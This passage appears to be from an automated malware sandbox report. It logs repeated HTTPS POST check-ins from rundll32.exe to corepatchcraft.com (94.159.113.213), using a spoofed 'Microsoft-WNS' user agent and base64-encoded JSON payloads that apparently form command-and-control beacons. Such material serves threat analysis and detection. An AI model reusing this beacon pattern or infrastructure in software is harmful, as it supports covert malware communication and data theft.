                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:02:46 UTC20INData Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 50 5a 55 64 6a 49 6e 30 3d
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        37192.168.2.66439094.159.113.2134432800C:\Windows\SysWOW64\rundll32.exe
                        TimestampBytes transferredDirectionData
                        2025-01-16 05:02:47 UTC250OUTPOST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:02:47 UTC249OUTData Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 49 54 69 74 4f 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6b 67 72 62 6e 6c 48 53 33 64 68 52 6a 6c 70 51 55 35 6c 4d 33 46 70 61 30 31 47 55 56 70 4e 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 50 5a 55 64 6a 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6b 78 4e 56 31 5a 51 55 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6b 68 4e 54 33 68 51 4c 31 46 46 5a 54 5a 78 52 45 34 30 5a 6a 4d 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 48 4f 44 5a 35 54 69 39 5a 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6b 64 61 51 30 52 44 5a 6b 5a 61 54 57 5a 59 59 57 52 51 56 31 56 33 55 56 49 76 54 69 39 4d 4d 30 74 54 4d 31 49 7a 65 54 4a 50 53 55 34 32 64 6e 67 72 63 48 4e 78 4e 6e 4d 39 49 6e 30 3d
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:02:47 UTC217INHTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:02:47 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:02:47 UTC20INData Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 50 5a 55 64 6a 49 6e 30 3d
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        38192.168.2.66440194.159.113.2134432800C:\Windows\SysWOW64\rundll32.exe
                        TimestampBytes transferredDirectionData
                        2025-01-16 05:02:48 UTC250OUTPOST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:02:48 UTC249OUTData Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 49 54 69 74 4f 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6b 67 72 62 6e 6c 48 53 33 64 68 52 6a 6c 70 51 55 35 6c 4d 33 46 70 61 30 31 47 55 56 70 4e 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 50 5a 55 64 6a 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6b 78 4e 56 31 5a 51 55 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6b 68 4e 54 33 68 51 4c 31 46 46 5a 54 5a 78 52 45 34 30 5a 6a 4d 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 48 4f 44 5a 35 54 69 39 5a 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6b 64 61 51 30 52 44 5a 6b 5a 61 54 57 5a 59 59 57 52 51 56 31 56 33 55 56 49 76 54 69 39 4d 4d 30 74 54 4d 31 49 7a 65 54 4a 50 53 55 34 32 64 6e 67 72 63 48 4e 78 4e 6e 4d 39 49 6e 30 3d
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:02:48 UTC217INHTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:02:48 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:02:48 UTC20INData Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 50 5a 55 64 6a 49 6e 30 3d
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        39192.168.2.66441094.159.113.2134432800C:\Windows\SysWOW64\rundll32.exe
                        TimestampBytes transferredDirectionData
                        2025-01-16 05:02:49 UTC250OUTPOST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:02:49 UTC249OUTData Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 49 54 69 74 4f 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6b 67 72 62 6e 6c 48 53 33 64 68 52 6a 6c 70 51 55 35 6c 4d 33 46 70 61 30 31 47 55 56 70 4e 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 50 5a 55 64 6a 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6b 78 4e 56 31 5a 51 55 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6b 68 4e 54 33 68 51 4c 31 46 46 5a 54 5a 78 52 45 34 30 5a 6a 4d 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 48 4f 44 5a 35 54 69 39 5a 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6b 64 61 51 30 52 44 5a 6b 5a 61 54 57 5a 59 59 57 52 51 56 31 56 33 55 56 49 76 54 69 39 4d 4d 30 74 54 4d 31 49 7a 65 54 4a 50 53 55 34 32 64 6e 67 72 63 48 4e 78 4e 6e 4d 39 49 6e 30 3d
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:02:50 UTC217INHTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:02:49 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:02:50 UTC20INData Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 50 5a 55 64 6a 49 6e 30 3d
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        40192.168.2.66441694.159.113.2134432800C:\Windows\SysWOW64\rundll32.exe
                        TimestampBytes transferredDirectionData
                        2025-01-16 05:02:51 UTC250OUTPOST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:02:51 UTC249OUTData Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 49 54 69 74 4f 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6b 67 72 62 6e 6c 48 53 33 64 68 52 6a 6c 70 51 55 35 6c 4d 33 46 70 61 30 31 47 55 56 70 4e 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 50 5a 55 64 6a 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6b 78 4e 56 31 5a 51 55 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6b 68 4e 54 33 68 51 4c 31 46 46 5a 54 5a 78 52 45 34 30 5a 6a 4d 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 48 4f 44 5a 35 54 69 39 5a 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6b 64 61 51 30 52 44 5a 6b 5a 61 54 57 5a 59 59 57 52 51 56 31 56 33 55 56 49 76 54 69 39 4d 4d 30 74 54 4d 31 49 7a 65 54 4a 50 53 55 34 32 64 6e 67 72 63 48 4e 78 4e 6e 4d 39 49 6e 30 3d
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:02:51 UTC217INHTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:02:51 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:02:51 UTC20INData Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 50 5a 55 64 6a 49 6e 30 3d
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        41192.168.2.66441794.159.113.2134432800C:\Windows\SysWOW64\rundll32.exe
                        TimestampBytes transferredDirectionData
                        2025-01-16 05:02:52 UTC250OUTPOST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:02:52 UTC249OUTData Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 49 54 69 74 4f 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6b 67 72 62 6e 6c 48 53 33 64 68 52 6a 6c 70 51 55 35 6c 4d 33 46 70 61 30 31 47 55 56 70 4e 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 50 5a 55 64 6a 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6b 78 4e 56 31 5a 51 55 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6b 68 4e 54 33 68 51 4c 31 46 46 5a 54 5a 78 52 45 34 30 5a 6a 4d 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 48 4f 44 5a 35 54 69 39 5a 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6b 64 61 51 30 52 44 5a 6b 5a 61 54 57 5a 59 59 57 52 51 56 31 56 33 55 56 49 76 54 69 39 4d 4d 30 74 54 4d 31 49 7a 65 54 4a 50 53 55 34 32 64 6e 67 72 63 48 4e 78 4e 6e 4d 39 49 6e 30 3d
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:02:52 UTC217INHTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:02:52 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:02:52 UTC20INData Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 50 5a 55 64 6a 49 6e 30 3d
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        42192.168.2.66441894.159.113.2134432800C:\Windows\SysWOW64\rundll32.exe
                        TimestampBytes transferredDirectionData
                        2025-01-16 05:02:53 UTC250OUTPOST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:02:53 UTC249OUTData Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 49 54 69 74 4f 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6b 67 72 62 6e 6c 48 53 33 64 68 52 6a 6c 70 51 55 35 6c 4d 33 46 70 61 30 31 47 55 56 70 4e 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 50 5a 55 64 6a 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6b 78 4e 56 31 5a 51 55 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6b 68 4e 54 33 68 51 4c 31 46 46 5a 54 5a 78 52 45 34 30 5a 6a 4d 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 48 4f 44 5a 35 54 69 39 5a 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6b 64 61 51 30 52 44 5a 6b 5a 61 54 57 5a 59 59 57 52 51 56 31 56 33 55 56 49 76 54 69 39 4d 4d 30 74 54 4d 31 49 7a 65 54 4a 50 53 55 34 32 64 6e 67 72 63 48 4e 78 4e 6e 4d 39 49 6e 30 3d
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:02:54 UTC217INHTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:02:54 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:02:54 UTC20INData Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 50 5a 55 64 6a 49 6e 30 3d
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        43192.168.2.66441994.159.113.2134432800C:\Windows\SysWOW64\rundll32.exe
                        TimestampBytes transferredDirectionData
                        2025-01-16 05:02:55 UTC250OUTPOST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:02:55 UTC249OUTData Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 49 54 69 74 4f 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6b 67 72 62 6e 6c 48 53 33 64 68 52 6a 6c 70 51 55 35 6c 4d 33 46 70 61 30 31 47 55 56 70 4e 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 50 5a 55 64 6a 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6b 78 4e 56 31 5a 51 55 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6b 68 4e 54 33 68 51 4c 31 46 46 5a 54 5a 78 52 45 34 30 5a 6a 4d 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 48 4f 44 5a 35 54 69 39 5a 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6b 64 61 51 30 52 44 5a 6b 5a 61 54 57 5a 59 59 57 52 51 56 31 56 33 55 56 49 76 54 69 39 4d 4d 30 74 54 4d 31 49 7a 65 54 4a 50 53 55 34 32 64 6e 67 72 63 48 4e 78 4e 6e 4d 39 49 6e 30 3d
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:02:55 UTC217INHTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:02:55 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:02:55 UTC20INData Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 50 5a 55 64 6a 49 6e 30 3d
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        44192.168.2.66442094.159.113.2134432800C:\Windows\SysWOW64\rundll32.exe
                        TimestampBytes transferredDirectionData
                        2025-01-16 05:02:56 UTC250OUTPOST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:02:56 UTC249OUTData Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 49 54 69 74 4f 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6b 67 72 62 6e 6c 48 53 33 64 68 52 6a 6c 70 51 55 35 6c 4d 33 46 70 61 30 31 47 55 56 70 4e 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 50 5a 55 64 6a 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6b 78 4e 56 31 5a 51 55 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6b 68 4e 54 33 68 51 4c 31 46 46 5a 54 5a 78 52 45 34 30 5a 6a 4d 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 48 4f 44 5a 35 54 69 39 5a 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6b 64 61 51 30 52 44 5a 6b 5a 61 54 57 5a 59 59 57 52 51 56 31 56 33 55 56 49 76 54 69 39 4d 4d 30 74 54 4d 31 49 7a 65 54 4a 50 53 55 34 32 64 6e 67 72 63 48 4e 78 4e 6e 4d 39 49 6e 30 3d
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:02:57 UTC217INHTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:02:56 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:02:57 UTC20INData Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 50 5a 55 64 6a 49 6e 30 3d
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        45192.168.2.66442194.159.113.2134432800C:\Windows\SysWOW64\rundll32.exe
                        TimestampBytes transferredDirectionData
                        2025-01-16 05:02:57 UTC250OUTPOST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:02:57 UTC249OUTData Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 49 54 69 74 4f 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6b 67 72 62 6e 6c 48 53 33 64 68 52 6a 6c 70 51 55 35 6c 4d 33 46 70 61 30 31 47 55 56 70 4e 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 50 5a 55 64 6a 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6b 78 4e 56 31 5a 51 55 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6b 68 4e 54 33 68 51 4c 31 46 46 5a 54 5a 78 52 45 34 30 5a 6a 4d 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 48 4f 44 5a 35 54 69 39 5a 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6b 64 61 51 30 52 44 5a 6b 5a 61 54 57 5a 59 59 57 52 51 56 31 56 33 55 56 49 76 54 69 39 4d 4d 30 74 54 4d 31 49 7a 65 54 4a 50 53 55 34 32 64 6e 67 72 63 48 4e 78 4e 6e 4d 39 49 6e 30 3d
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:02:58 UTC217INHTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:02:58 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:02:58 UTC20INData Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 50 5a 55 64 6a 49 6e 30 3d
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        46192.168.2.66442294.159.113.2134432800C:\Windows\SysWOW64\rundll32.exe
                        TimestampBytes transferredDirectionData
                        2025-01-16 05:02:59 UTC250OUTPOST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:02:59 UTC249OUTData Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 49 54 69 74 4f 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6b 67 72 62 6e 6c 48 53 33 64 68 52 6a 6c 70 51 55 35 6c 4d 33 46 70 61 30 31 47 55 56 70 4e 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 50 5a 55 64 6a 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6b 78 4e 56 31 5a 51 55 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6b 68 4e 54 33 68 51 4c 31 46 46 5a 54 5a 78 52 45 34 30 5a 6a 4d 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 48 4f 44 5a 35 54 69 39 5a 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6b 64 61 51 30 52 44 5a 6b 5a 61 54 57 5a 59 59 57 52 51 56 31 56 33 55 56 49 76 54 69 39 4d 4d 30 74 54 4d 31 49 7a 65 54 4a 50 53 55 34 32 64 6e 67 72 63 48 4e 78 4e 6e 4d 39 49 6e 30 3d
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:02:59 UTC217INHTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:02:59 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:02:59 UTC20INData Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 50 5a 55 64 6a 49 6e 30 3d
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        47192.168.2.66442394.159.113.2134432800C:\Windows\SysWOW64\rundll32.exe
                        TimestampBytes transferredDirectionData
                        2025-01-16 05:03:00 UTC250OUTPOST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:03:00 UTC249OUTData Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 49 54 69 74 4f 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6b 67 72 62 6e 6c 48 53 33 64 68 52 6a 6c 70 51 55 35 6c 4d 33 46 70 61 30 31 47 55 56 70 4e 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 50 5a 55 64 6a 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6b 78 4e 56 31 5a 51 55 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6b 68 4e 54 33 68 51 4c 31 46 46 5a 54 5a 78 52 45 34 30 5a 6a 4d 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 48 4f 44 5a 35 54 69 39 5a 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6b 64 61 51 30 52 44 5a 6b 5a 61 54 57 5a 59 59 57 52 51 56 31 56 33 55 56 49 76 54 69 39 4d 4d 30 74 54 4d 31 49 7a 65 54 4a 50 53 55 34 32 64 6e 67 72 63 48 4e 78 4e 6e 4d 39 49 6e 30 3d
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:03:01 UTC217INHTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:03:01 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
